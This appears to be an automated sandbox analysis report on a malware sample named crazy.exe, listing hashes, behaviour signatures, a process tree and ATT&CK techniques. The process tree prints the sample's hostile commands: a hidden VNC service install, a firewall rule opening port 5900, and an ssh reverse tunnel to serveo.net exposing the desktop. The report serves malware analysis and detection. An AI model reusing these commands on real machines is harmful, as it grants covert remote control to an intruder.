Analysis

  • max time kernel
    150s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    24-06-2020 13:40

General

  • Target

    crazy.exe

  • Size

    5.2MB

  • MD5

    5681f1da959eb80af6735166b1e71cdb

  • SHA1

    74036e08dea67fbbee5d81e07fb24408fe4305fe

  • SHA256

    69cd9793d80b5e5d7f5bf377822dc573c84ef939ede4eedd892fd1b757435bff

  • SHA512

    d175f8adc5f6ac0e1a616bf24f1c3d884ca02e9f057e15ede43297ef0472a80a286ae032acaeedf9a6d87449fb6abe020fcdcb549f79429266919717f711f82d

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 5 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Drops file in Windows directory 10 IoCs
  • Runs net.exe
  • Modifies Windows Firewall 1 TTPs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Loads dropped DLL 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 89 IoCs
  • Suspicious use of FindShellTrayWindow 58 IoCs
  • Modifies service 2 TTPs 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\crazy.exe
    "C:\Users\Admin\AppData\Local\Temp\crazy.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1544
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\463.tmp\Install.bat" "
      2⤵
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      • Loads dropped DLL
      PID:892
      • C:\Windows\vnc\winvnc.exe
        C:\Windows\vnc\winvnc -install
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        • Modifies service
        PID:324
        • C:\Windows\system32\net.exe
          net start "uvnc_service"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1036
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 start "uvnc_service"
            5⤵
              PID:1692
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall firewall add rule name=vnc action=allow dir=in protocol=tcp localport=5900
          3⤵
          • Modifies service
          PID:1504
        • C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
          test1.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          • Loads dropped DLL
          PID:1876
          • C:\Users\Admin\AppData\Local\Temp\463.tmp\test1.exe
            test1.exe
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            • Loads dropped DLL
            PID:1892
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "ssh -o "StrictHostKeyChecking=no" -R itisme:5800:10.7.0.10:5900 serveo.net"
              5⤵
                PID:1916
      • C:\Windows\vnc\winvnc.exe
        "C:\Windows\vnc\winvnc.exe" -service
        1⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1776
        • C:\Windows\vnc\winvnc.exe
          C:\Windows\vnc\winvnc.exe -service_run
          2⤵
          • Executes dropped EXE
          • Suspicious use of SendNotifyMessage
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          PID:1808

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      Modify Existing Service

      2
      T1031

      Defense Evasion

      Modify Registry

      1
      T1112

      Replay Monitor

      Loading Replay Monitor...

      Downloads